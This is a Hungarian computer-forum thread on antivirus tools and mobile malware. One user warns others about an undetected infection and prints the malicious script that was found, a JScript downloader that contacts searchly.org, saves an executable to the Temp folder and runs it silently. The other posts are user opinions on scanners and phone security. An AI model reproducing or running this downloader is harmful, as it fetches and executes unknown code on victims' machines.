Antivirus & Antispyware (Vírusvédelem)
Jelentkezz be a hozzászóláshoz.
ASUS B550-PLUS, AMD 5600X, 32 GB DDR4, EVGA RTX 3070, SM-OB1, HD 600 + Asus Xonar DX, TonePort UX1 + Alesis Elevate 5, Novation Circuit \o/
Ha esetleg találkozna valaki hasonlóval, bedobtam ide.
Valszeg a mirillis action! tette fel 1 hónapja kb, de semmi nem észlelte. Meghagytam egy elég érdekes ini fájlt:
Spoiler (katt a megjelenítéshez)
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"😉;
WinHttpReq.Open("GET", "http://searchly.org/xVwd2.php", /*async=*/false);
WinHttpReq.Send();
strDlUrl = WinHttpReq.ResponseText;
var TmpDir = new ActiveXObject("WScript.Shell"😉.ExpandEnvironmentStrings("%Temp%"😉;
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"😉;
WinHttpReq.Open("GET", strDlUrl, /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream"😉;
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(TmpDir + "\\wVx4rt.exe",2);
var WshShell = new ActiveXObject("WScript.Shell"😉;
WshShell.Run (TmpDir + "\\wVx4rt.exe /quiet"😉;
ASUS B550-PLUS, AMD 5600X, 32 GB DDR4, EVGA RTX 3070, SM-OB1, HD 600 + Asus Xonar DX, TonePort UX1 + Alesis Elevate 5, Novation Circuit \o/
Sajnos azt kell mondjam, hogy a testvérem gépjéről le kellett töröljem az Avast-ot. Egy olyan *.sys fájl került be a gépjébe (ha jól emlékszem a .../system32/drivers/gt.sys, Windows XP SP3 rendszer), hogy nem akadályozta a gépet, de ha egy távoli kapcsolat érkezett (Team Viewer-rel) egyből RESET, indult is újra a gép. Ki is sepertem, azóta 360 Total Security-t telepítettem fel és maximális védelemre kapcsoltam (Avira és BitDefender motorok valós időben működnek).
Azért töröltem le, mert eltelt egy pár nap és nem detektálta, pedig frissített rendesen. Ha detektálta volna, akkor adtam volna egy boot idejű keresést és akkor gondolom ki tudta volna törölni.
\"When no one else will fuck you, I\'m always there.\" - Life
https://www.sendspace.com/file/8fm8ne
Elvileg most már mindent könnyen ki lehet seperni, csak meg kell találni egyszer!
Kb. 3 éves a gépem/rendszerem, ccleanert használom, az intel ssd-hez a toolboxot. Ezeket havonta 1x lefuttatom. Problémamentesen működik minden a mai napig. Windows 7 rendszerem van.
Sokan bekapcsolják hogy real-time figyeljék és "optimalizálják" a lemezt,gond ezáltal az, hogy rohadt lassan indul a böngéződ és olykor egyéb szaggadtások léphetnek fel....
Amúgyis win 7 esetén így már kettő is futna real-time:kapcsold ki win7 real-time-ját és úgy havi rutinként futass egy munkamenetet.
Utoljára szerkesztette: gergely1991, 2015.01.11. 18:15:10
Xubuntu 14.04.5 /WIndows 7 Enterprise/Windows XP professional SP3(némely szoftver inkompatibilis az elöz?vel). :)
unzip ; touch ; finger ; mount ; gasp ; yes ; umount ; sleep
A qtorrent vírusos lett?
Ugrik rá a G-Data Bitdefender motorja...<#boxer>#boxer>
Nem látok,nem hallok,nem beszélek csak a véreteket akarom!
Szerintem mindegyiknek megvannak/meglesznek a maga problémái.
Linuxra is elmondták hogy milyen biztonságos egyszer csak szivárgott egy biztonsági rés amivel bárki könnyen átveheti az irányítást a gép felett és még root jogosultságot szerez.Ez annak köszönhető hogy jó néhány szerveren már linux fut sok hivatalnál is átálltak az ingyenes megoldásra.Ez az jelenti hogy minél divatosabb a rendszer annál inkább fenyegetettebb a támadásoktól.......
Azaz Windows Phone esetében még nem terjedt el, amennyiben el fog, akkor ők is célpontjai lesznek a támadásoknak.
Xubuntu 14.04.5 /WIndows 7 Enterprise/Windows XP professional SP3(némely szoftver inkompatibilis az elöz?vel). :)
De te is tapasztalatból beszélsz, én is. Nekem ez a tapasztalatom a körömben. Szerintem mind a 3 rendszer jó, a többi csak az emberen és a pénzen múlik meg a jó választáson.
KaBuTo666: A másik dolog, hogy az Android esetében ugyanarra a gyorsaságra több RAM kell és processzor frekv., mint egy WP8.1 rendszerű okostelefonnál. Ezt többen is mondták és több helyen olvastam (igaz saját tapasztalatom nincs, mert nem tudtam kipróbálni), hogy az Android alkalmazások több erőforrást igényelnek, mint a WP alkalmazások.
A sony azt mondta, nem lehet feltörni a konzoljukat. A PS3-t feltörte az a srác.
Alábecsülöd a hackereket. Lesz vírus előbb utóbb windows phonera, vagy van, csak mi nem tudunk róla. Egyelőre nem olyan népszerű ez a mobil, de a jövőt te sem látod. Szerintem ne úgy válassz mobil rendszert, hogy az első opciód a biztonság.
Szerintem a legtöbb okostelefon felhasználó egyáltalán nem használja ki az internetet és nem böngésznek mindenféle oldalon és ezért nem kerül be vírus az Android telefonokba.
A malwaretips.com vannak olyan csomagok, amelyek sokszor tele vannak *.apk fertőzött fájlokkal, ezt se felejtsük el!
Érdekes módon nekem évek óta van okos-telefonom, vírust még nem sikerült összeszedtem úgy hogy antivírust se használok.
PC-n van antivírus, de nem kellett izzadnia mellettem.
Ha tényleg ennyire paranoiás vagy, akkor nagyon egyszerű a dolog...nem kell okos telefont venned. Maradj a hagyományos gombos mobiloknál. Azzal is tudsz telefonálni, sms-t írni.
A másik meg, nem tudhatod hogy nincs vírus windows phonera. Maximum hiheted.
Azért jó lenne, ha leírnád a te véleményedet is, mivel azt mondtad, hogy "Kicsit túlzásba estél ezzel a mobil vírusos dologgal, számolj el 50-ig és gondold át mit is akarsz venni."
Ezek szerint maga a Tapsnake játék a kémprogram?
Aki ért hozzá csak az válaszoljon,felesleges kommenteket mellőzzétek ha lehet!
Utoljára szerkesztette: Ironman2, 2014.12.12. 12:50:18
ASUS PRIME Z790-p,Intel CoreI7-12700K 3600Mhz,Gainward Geforce RTX 4060 8Gb VRAM,32GB DDR5 Kingston memory,Samsung S24D300H0 monitor,WIN 11
#last-read{
display:none;}
De azt rakom be amit írtál.
köszönöm 😊
Utoljára szerkesztette: gergely1991, 2014.11.06. 15:01:56